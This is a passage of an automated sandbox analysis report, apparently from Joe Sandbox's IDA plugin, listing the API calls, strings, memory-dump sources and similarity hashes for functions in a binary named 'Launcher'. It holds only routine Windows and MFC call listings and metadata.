                                                                                                      • Part of subcall function 0067D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0067D98C
                                                                                                      • Part of subcall function 0067D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0067D997
                                                                                                      • Part of subcall function 0067D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 0067D99F
                                                                                                      • Part of subcall function 0067D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 0067D9AA
                                                                                                      • Part of subcall function 0067D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0067DA13
                                                                                                    • #800.MFC42U(?), ref: 00670FF9
                                                                                                    • #800.MFC42U(?,00669ECC,?,0066A8E9), ref: 00671034
                                                                                                    • #800.MFC42U(?,00669ECC,?,0066A8E9), ref: 0067103F
                                                                                                    • #641.MFC42U(?,00669ECC,?,0066A8E9), ref: 0067104A
                                                                                                    Strings
                                                                                                    • LoadTypeLib( %s ) failed., xrefs: 00670FC9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #800$#2810#540$#1197#3494#641#858#922FormatFreeH_prolog3LocalMessage
                                                                                                    • String ID: LoadTypeLib( %s ) failed.
                                                                                                    • API String ID: 1985387798-1961472862
                                                                                                    • Opcode ID: 70c64c34573418ece20359987725a9fc869a454fa2170bd2c74aad9938d24e30
                                                                                                    • Instruction ID: 8d9871966480c8e942c5534dc3bf9d09f366a1e31e51759528597e2beba5034a
                                                                                                    • Opcode Fuzzy Hash: 70c64c34573418ece20359987725a9fc869a454fa2170bd2c74aad9938d24e30
                                                                                                    • Instruction Fuzzy Hash: EB115B319006689BCB56EB50CC82AED737A6F25305F4884D9E50E671A1EF351F88CB14
                                                                                                    APIs
                                                                                                    • GetAclInformation.ADVAPI32(00000000,0067BA07,0000000C,00000002,00000000,0000000C,?,?,0067BA07), ref: 0067C64E
                                                                                                    • GetLastError.KERNEL32(?,0067BA07), ref: 0067C658
                                                                                                    • GetLengthSid.ADVAPI32(00000000,00000001,00000000,0000000C,?,?,0067BA07), ref: 0067C675
                                                                                                    • malloc.MSVCRT ref: 0067C687
                                                                                                    • InitializeAcl.ADVAPI32(00000000,00000002,00000002,0067BA07), ref: 0067C6A1
                                                                                                    • AddAccessAllowedAce.ADVAPI32(00000000,00000002,00000000,00000000), ref: 0067C6B2
                                                                                                    • GetLastError.KERNEL32 ref: 0067C6BC
                                                                                                    • free.MSVCRT ref: 0067C6D2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$AccessAllowedInformationInitializeLengthfreemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 86704185-0
                                                                                                    • Opcode ID: 8814a1bd6c92bf4d96f6dfbb1b06d561de07534ed40bc7da7e8f1c0a4150ef33
                                                                                                    • Instruction ID: 3ec25cbf876eada037b9bb195b46f1f58ed33111e31311dd41cacd07b4d8c89c
                                                                                                    • Opcode Fuzzy Hash: 8814a1bd6c92bf4d96f6dfbb1b06d561de07534ed40bc7da7e8f1c0a4150ef33
                                                                                                    • Instruction Fuzzy Hash: 5231DF31600206EBD7119F699C88BAF77BAEF45720F21911DF90AE6240EF74C9018BA5
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0066EFEA
                                                                                                    • #540.MFC42U(000000F8), ref: 0066EFF7
                                                                                                      • Part of subcall function 0066CF40: __EH_prolog3.LIBCMT ref: 0066CF47
                                                                                                      • Part of subcall function 0066CF40: #324.MFC42U(00000092,?,00000008), ref: 0066CF59
                                                                                                      • Part of subcall function 0066CF40: #567.MFC42U(00000092,?,00000008), ref: 0066CF73
                                                                                                    • #3871.MFC42U(?,000000F8), ref: 0066F01F
                                                                                                    • lstrcpyW.KERNEL32(?,?,?,000000F8), ref: 0066F031
                                                                                                    • #2506.MFC42U ref: 0066F03D
                                                                                                    • #6195.MFC42U(?), ref: 0066F050
                                                                                                    • #6330.MFC42U(00000000), ref: 0066F059
                                                                                                    • #693.MFC42U(00000000), ref: 0066F061
                                                                                                    • #641.MFC42U(00000000), ref: 0066F06C
                                                                                                    • #800.MFC42U(00000000), ref: 0066F077
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #2506#324#3871#540#567#6195#6330#641#693#800H_prolog3H_prolog3_lstrcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 768229929-0
                                                                                                    • Opcode ID: a0b7b8d4cf13d376a112d64c86cffd132954572d8d68c2dd7772bf9d73e5a73f
                                                                                                    • Instruction ID: 658da51fee0b960fb054e5c4a51d831280a75fc09e0bc0ecb33d8cd4dcf7fa4a
                                                                                                    • Opcode Fuzzy Hash: a0b7b8d4cf13d376a112d64c86cffd132954572d8d68c2dd7772bf9d73e5a73f
                                                                                                    • Instruction Fuzzy Hash: 79015E309001299BCBA5FB60C992BECB37BAF64310F8084DCE14967182DFB55F88CB56
                                                                                                    APIs
                                                                                                    • #800.MFC42U(?,0066D805,?,0066D83D), ref: 0066F47D
                                                                                                    • #800.MFC42U(?,0066D805,?,0066D83D), ref: 0066F488
                                                                                                    • #800.MFC42U(?,0066D805,?,0066D83D), ref: 0066F493
                                                                                                    • #800.MFC42U(?,0066D805,?,0066D83D), ref: 0066F49E
                                                                                                    • #616.MFC42U(?,0066D805,?,0066D83D), ref: 0066F4A9
                                                                                                    • #656.MFC42U(?,0066D805,?,0066D83D), ref: 0066F4B4
                                                                                                    • #609.MFC42U(?,0066D805,?,0066D83D), ref: 0066F4BF
                                                                                                    • #609.MFC42U(?,0066D805,?,0066D83D), ref: 0066F4CA
                                                                                                    • #804.MFC42U(?,0066D805,?,0066D83D), ref: 0066F4D2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #800$#609$#616#656#804
                                                                                                    • String ID:
                                                                                                    • API String ID: 3383334730-0
                                                                                                    • Opcode ID: 928e1f20de63f5d64d411b4b6220a5b2b38c2e8c1e501ff205ce77ecfae3ac80
                                                                                                    • Instruction ID: aa46384ca35d61606991abee86c74bcec0f3bc0e13caa06c2f9fecbd7c55f4e5
                                                                                                    • Opcode Fuzzy Hash: 928e1f20de63f5d64d411b4b6220a5b2b38c2e8c1e501ff205ce77ecfae3ac80
                                                                                                    • Instruction Fuzzy Hash: 07F06735040A11DBC2A9FB30D592AEAB7B7AF24310F408D6DE1AF07192FF713A09CA44
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 0066C722
                                                                                                      • Part of subcall function 0067D2F7: wsprintfW.USER32 ref: 0067D35B
                                                                                                      • Part of subcall function 0067D2F7: lstrcatW.KERNEL32(?,006660AC), ref: 0067D376
                                                                                                      • Part of subcall function 0067D2F7: lstrcatW.KERNEL32(?,?), ref: 0067D37E
                                                                                                      • Part of subcall function 0067C0BC: __EH_prolog3_GS.LIBCMT ref: 0067C0C6
                                                                                                      • Part of subcall function 0067C0BC: #540.MFC42U(00000488,0066C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 0067C0F1
                                                                                                      • Part of subcall function 0067C0BC: RegOpenKeyExW.ADVAPI32 ref: 0067C112
                                                                                                      • Part of subcall function 0067C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0067C13A
                                                                                                      • Part of subcall function 0067C0BC: RegCloseKey.ADVAPI32(?), ref: 0067C151
                                                                                                      • Part of subcall function 0067C0BC: #800.MFC42U ref: 0067C15F
                                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 0066C78D
                                                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0066C79D
                                                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0066C7A9
                                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 0066C7B8
                                                                                                    • #2634.MFC42U(00000001,?,?,?,?), ref: 0066C7C8
                                                                                                    • #2634.MFC42U(00000001,00000001,?,?,?,?), ref: 0066C7D4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$#2634lstrcat$#540#800CloseH_prolog3_OpenQueryValuewsprintf
                                                                                                    • String ID: AccessPermission
                                                                                                    • API String ID: 1928919276-2751749857
                                                                                                    • Opcode ID: 9c623a9e4e1d8e7fd8398d50aaf1df98c721fc8857053d896851ef0227313e0f
                                                                                                    • Instruction ID: 3d798493cf3660cb22ac9bb7f715bcac7825e03ebbdd19ed2b5bcdbec5513d8b
                                                                                                    • Opcode Fuzzy Hash: 9c623a9e4e1d8e7fd8398d50aaf1df98c721fc8857053d896851ef0227313e0f
                                                                                                    • Instruction Fuzzy Hash: 1521CFB050061AFFEB24AF70CC89EEBBB7EEF45354F0182A8B519A6151DB715D44CBA0
                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 0066D6BD
                                                                                                    • #364.MFC42U(0000007A,00000008,0066D2DA,00000004), ref: 0066D6C9
                                                                                                      • Part of subcall function 0066C4B6: __EH_prolog3.LIBCMT ref: 0066C4BD
                                                                                                      • Part of subcall function 0066C4B6: #324.MFC42U(00000088,00000000,00000008,0066BFBA,00000004), ref: 0066C4CE
                                                                                                      • Part of subcall function 0066C4B6: #567.MFC42U(00000088,00000000,00000008,0066BFBA,00000004), ref: 0066C4E5
                                                                                                      • Part of subcall function 0066C4B6: #567.MFC42U(00000088,00000000,00000008,0066BFBA,00000004), ref: 0066C500
                                                                                                      • Part of subcall function 0066C4B6: #567.MFC42U(00000088,00000000,00000008,0066BFBA,00000004), ref: 0066C516
                                                                                                      • Part of subcall function 0066C4B6: #567.MFC42U(00000088,00000000,00000008,0066BFBA,00000004), ref: 0066C52C
                                                                                                      • Part of subcall function 006709D5: __EH_prolog3.LIBCMT ref: 006709DC
                                                                                                      • Part of subcall function 006709D5: #324.MFC42U(00000087,00000000,00000008,0066D6F2,0000007A,00000008,0066D2DA,00000004), ref: 006709ED
                                                                                                      • Part of subcall function 006709D5: #567.MFC42U(00000087,00000000,00000008,0066D6F2,0000007A,00000008,0066D2DA,00000004), ref: 00670A04
                                                                                                      • Part of subcall function 006709D5: #567.MFC42U(00000087,00000000,00000008,0066D6F2,0000007A,00000008,0066D2DA,00000004), ref: 00670A1F
                                                                                                      • Part of subcall function 006709D5: #567.MFC42U(00000087,00000000,00000008,0066D6F2,0000007A,00000008,0066D2DA,00000004), ref: 00670A35
                                                                                                      • Part of subcall function 006709D5: #567.MFC42U(00000087,00000000,00000008,0066D6F2,0000007A,00000008,0066D2DA,00000004), ref: 00670A4B
                                                                                                      • Part of subcall function 006709D5: #567.MFC42U(00000087,00000000,00000008,0066D6F2,0000007A,00000008,0066D2DA,00000004), ref: 00670A61
                                                                                                      • Part of subcall function 0066F346: __EH_prolog3.LIBCMT ref: 0066F34D
                                                                                                      • Part of subcall function 0066F346: #324.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F35E
                                                                                                      • Part of subcall function 0066F346: #567.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F375
                                                                                                      • Part of subcall function 0066F346: #567.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F38F
                                                                                                      • Part of subcall function 0066F346: #567.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F3AA
                                                                                                      • Part of subcall function 0066F346: #567.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F3C0
                                                                                                      • Part of subcall function 0066F346: #567.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F3DA
                                                                                                      • Part of subcall function 0066F346: #540.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F3EF
                                                                                                      • Part of subcall function 0066F346: #540.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F400
                                                                                                      • Part of subcall function 0066F346: #540.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F40F
                                                                                                      • Part of subcall function 0066F346: #540.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F420
                                                                                                      • Part of subcall function 0066F346: #861.MFC42U(006621A0,0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F436
                                                                                                      • Part of subcall function 0066F346: #861.MFC42U(006621A0,006621A0,0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F442
                                                                                                      • Part of subcall function 0066F346: #861.MFC42U(006621A0,006621A0,006621A0,0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F453
                                                                                                      • Part of subcall function 0066F346: #861.MFC42U(006621A0,006621A0,006621A0,006621A0,0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F45F
                                                                                                      • Part of subcall function 0066C962: __EH_prolog3.LIBCMT ref: 0066C969
                                                                                                      • Part of subcall function 0066C962: #324.MFC42U(00000085,00000000,00000008,0066C91A,00000004), ref: 0066C97A
                                                                                                      • Part of subcall function 0066C962: #567.MFC42U(00000085,00000000,00000008,0066C91A,00000004), ref: 0066C991
                                                                                                      • Part of subcall function 0066C962: #567.MFC42U(00000085,00000000,00000008,0066C91A,00000004), ref: 0066C9AB
                                                                                                      • Part of subcall function 0066C962: #540.MFC42U(00000085,00000000,00000008,0066C91A,00000004), ref: 0066C9C2
                                                                                                      • Part of subcall function 0066C962: #540.MFC42U(00000085,00000000,00000008,0066C91A,00000004), ref: 0066C9D1
                                                                                                      • Part of subcall function 0066C962: #861.MFC42U(006621A0), ref: 0066C9E8
                                                                                                      • Part of subcall function 00679485: __EH_prolog3.LIBCMT ref: 0067948C
                                                                                                      • Part of subcall function 00679485: #326.MFC42U(00000008,0066D71F,0000007A,00000008,0066D2DA,00000004), ref: 00679496
                                                                                                      • Part of subcall function 00679485: #567.MFC42U(00000008,0066D71F,0000007A,00000008,0066D2DA,00000004), ref: 006794AD
                                                                                                    • #567.MFC42U(0000007A,00000008,0066D2DA,00000004), ref: 0066D72E
                                                                                                    • #567.MFC42U(0000007A,00000008,0066D2DA,00000004), ref: 0066D748
                                                                                                    • #567.MFC42U(0000007A,00000008,0066D2DA,00000004), ref: 0066D763
                                                                                                    • #567.MFC42U(0000007A,00000008,0066D2DA,00000004), ref: 0066D779
                                                                                                    • #567.MFC42U(0000007A,00000008,0066D2DA,00000004), ref: 0066D78F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #567$#540H_prolog3$#861$#324$#326#364
                                                                                                    • String ID: 0g
                                                                                                    • API String ID: 797904982-2778760150
                                                                                                    • Opcode ID: 4f3d07fed104b8202b7f0bc64381b0d6ffdee15925b9207f1775b902891d5ed9
                                                                                                    • Instruction ID: e4cfdcb5248d4dd622976aef10fe0163ee53c58115d54b6fdd05933d3120f280
                                                                                                    • Opcode Fuzzy Hash: 4f3d07fed104b8202b7f0bc64381b0d6ffdee15925b9207f1775b902891d5ed9
                                                                                                    • Instruction Fuzzy Hash: 67215170A05A5ADADB45EFA4C5123DCFBA2BF19304F50818DD48937342CB792B09CBD6
                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 006717C7
                                                                                                    • #2859.MFC42U(?,0000000C), ref: 006717CF
                                                                                                    • #538.MFC42U(QueryInterface(IID_IUnknown) failed on the data object.,?,?,?,?,0000000C), ref: 00671803
                                                                                                      • Part of subcall function 0067D91D: __EH_prolog3.LIBCMT ref: 0067D924
                                                                                                      • Part of subcall function 0067D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,0067B9B7,?,00000000,00000000,00000000), ref: 0067D942
                                                                                                      • Part of subcall function 0067D91D: #540.MFC42U ref: 0067D94F
                                                                                                      • Part of subcall function 0067D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 0067D96C
                                                                                                      • Part of subcall function 0067D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 0067D97F
                                                                                                      • Part of subcall function 0067D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0067D98C
                                                                                                      • Part of subcall function 0067D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0067D997
                                                                                                      • Part of subcall function 0067D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 0067D99F
                                                                                                      • Part of subcall function 0067D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 0067D9AA
                                                                                                      • Part of subcall function 0067D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0067DA13
                                                                                                    • #800.MFC42U(?,00000000,QueryInterface(IID_IUnknown) failed on the data object.,?,?,?,?,0000000C), ref: 00671819
                                                                                                    • #538.MFC42U(Drag and Drop Data Object,?,?,?,?,0000000C), ref: 00671828
                                                                                                    • #800.MFC42U(00000000,?,Drag and Drop Data Object,?,?,?,?,0000000C), ref: 0067184D
                                                                                                    Strings
                                                                                                    • QueryInterface(IID_IUnknown) failed on the data object., xrefs: 006717FB
                                                                                                    • Drag and Drop Data Object, xrefs: 00671820
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #800$#538H_prolog3$#1197#2810#2859#540#858#922FormatFreeLocalMessage
                                                                                                    • String ID: Drag and Drop Data Object$QueryInterface(IID_IUnknown) failed on the data object.
                                                                                                    • API String ID: 393685950-3430251513
                                                                                                    • Opcode ID: f92d9d3c363a5f7ef6efaf522af6502bff39aa333b077a83d3db05eb19b4b820
                                                                                                    • Instruction ID: 5b68e812468cd291028d0d537476956bf19df105abebae0d950a71a458334546
                                                                                                    • Opcode Fuzzy Hash: f92d9d3c363a5f7ef6efaf522af6502bff39aa333b077a83d3db05eb19b4b820
                                                                                                    • Instruction Fuzzy Hash: A7116031910119DBCB44EBA0C8559BEB776FF54320F20865CE6156B2E1DF316E01CB95
                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 006709DC
                                                                                                    • #324.MFC42U(00000087,00000000,00000008,0066D6F2,0000007A,00000008,0066D2DA,00000004), ref: 006709ED
                                                                                                    • #567.MFC42U(00000087,00000000,00000008,0066D6F2,0000007A,00000008,0066D2DA,00000004), ref: 00670A04
                                                                                                    • #567.MFC42U(00000087,00000000,00000008,0066D6F2,0000007A,00000008,0066D2DA,00000004), ref: 00670A1F
                                                                                                    • #567.MFC42U(00000087,00000000,00000008,0066D6F2,0000007A,00000008,0066D2DA,00000004), ref: 00670A35
                                                                                                    • #567.MFC42U(00000087,00000000,00000008,0066D6F2,0000007A,00000008,0066D2DA,00000004), ref: 00670A4B
                                                                                                    • #567.MFC42U(00000087,00000000,00000008,0066D6F2,0000007A,00000008,0066D2DA,00000004), ref: 00670A61
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #567$#324H_prolog3
                                                                                                    • String ID: Pg
                                                                                                    • API String ID: 3217428371-1016263835
                                                                                                    • Opcode ID: 0cda0abfc71055b4348c2f34d472204103ba10a3545f3507b9105ae4c146a200
                                                                                                    • Instruction ID: 3e1c2b059b3b4e349ebdc8faf168881c21023c794eb54fafd9dec0deda7cf317
                                                                                                    • Opcode Fuzzy Hash: 0cda0abfc71055b4348c2f34d472204103ba10a3545f3507b9105ae4c146a200
                                                                                                    • Instruction Fuzzy Hash: 0A113C71A01656DBDB45DFA484023DCBBB2BF58700F60844EE5883B382CBB51B49CBDA
                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 0066ED50
                                                                                                    • #498.MFC42U(00000090), ref: 0066ED5A
                                                                                                      • Part of subcall function 0066E941: __EH_prolog3.LIBCMT ref: 0066E948
                                                                                                      • Part of subcall function 0066E941: #489.MFC42U(0000008F,00000000,00000008,0066E8DA,00000004), ref: 0066E959
                                                                                                      • Part of subcall function 0066E941: #567.MFC42U(0000008F,00000000,00000008,0066E8DA,00000004), ref: 0066E973
                                                                                                      • Part of subcall function 0066E736: __EH_prolog3.LIBCMT ref: 0066E73D
                                                                                                      • Part of subcall function 0066E736: #489.MFC42U(00000090,00000000,00000008,0066E6BA,00000004), ref: 0066E74E
                                                                                                      • Part of subcall function 0066E736: #567.MFC42U(00000090,00000000,00000008,0066E6BA,00000004), ref: 0066E768
                                                                                                      • Part of subcall function 0067B460: __EH_prolog3.LIBCMT ref: 0067B467
                                                                                                      • Part of subcall function 0067B460: #489.MFC42U(0000008D,00000000,00000008,0066ED96,00000090), ref: 0067B478
                                                                                                      • Part of subcall function 0067B460: #567.MFC42U(0000008D,00000000,00000008,0066ED96,00000090), ref: 0067B492
                                                                                                      • Part of subcall function 0067B460: #567.MFC42U(0000008D,00000000,00000008,0066ED96,00000090), ref: 0067B4AD
                                                                                                    • #497.MFC42U(006621A0,?,00000000,00000090), ref: 0066EDAA
                                                                                                    • #771.MFC42U(006621A0,?,00000000,00000090), ref: 0066EDB5
                                                                                                    • #1008.MFC42U(?,006621A0,?,00000000,00000090), ref: 0066EDBD
                                                                                                      • Part of subcall function 0067D4CD: GetVersionExW.KERNEL32(?), ref: 0067D4F3
                                                                                                    • #1008.MFC42U(?,?,006621A0,?,00000000,00000090), ref: 0066EDCE
                                                                                                    • #1008.MFC42U(?,?,?,006621A0,?,00000000,00000090), ref: 0066EDDC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #567H_prolog3$#1008#489$#497#498#771Version
                                                                                                    • String ID: `f
                                                                                                    • API String ID: 3371278394-3937696907
                                                                                                    • Opcode ID: 0fc6d0cd47c51027353e036665496c9b3a7f1bee86e0b4e7b3d3008c9b3dd9a7
                                                                                                    • Instruction ID: 0a715b7f847922b6324ef0760a1147001722bddf0e68b05c6a98182f0430979c
                                                                                                    • Opcode Fuzzy Hash: 0fc6d0cd47c51027353e036665496c9b3a7f1bee86e0b4e7b3d3008c9b3dd9a7
                                                                                                    • Instruction Fuzzy Hash: 47019234B00545EADB54FBB08855BECEBA76F48300F14C19DE40C53282CF715A0C9AAA
                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 0066C969
                                                                                                    • #324.MFC42U(00000085,00000000,00000008,0066C91A,00000004), ref: 0066C97A
                                                                                                    • #567.MFC42U(00000085,00000000,00000008,0066C91A,00000004), ref: 0066C991
                                                                                                    • #567.MFC42U(00000085,00000000,00000008,0066C91A,00000004), ref: 0066C9AB
                                                                                                    • #540.MFC42U(00000085,00000000,00000008,0066C91A,00000004), ref: 0066C9C2
                                                                                                    • #540.MFC42U(00000085,00000000,00000008,0066C91A,00000004), ref: 0066C9D1
                                                                                                    • #861.MFC42U(006621A0), ref: 0066C9E8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #540#567$#324#861H_prolog3
                                                                                                    • String ID: Pg
                                                                                                    • API String ID: 4024192314-1016263835
                                                                                                    • Opcode ID: 4995708dd3bc5e581d4a7a622a9c742bff4f7e5244ac5e95412cc904f92f4cc6
                                                                                                    • Instruction ID: a646594e6abdae8e1ce5fb7474c6317925753126d9ca1c4e7ead5db0bafd9f45
                                                                                                    • Opcode Fuzzy Hash: 4995708dd3bc5e581d4a7a622a9c742bff4f7e5244ac5e95412cc904f92f4cc6
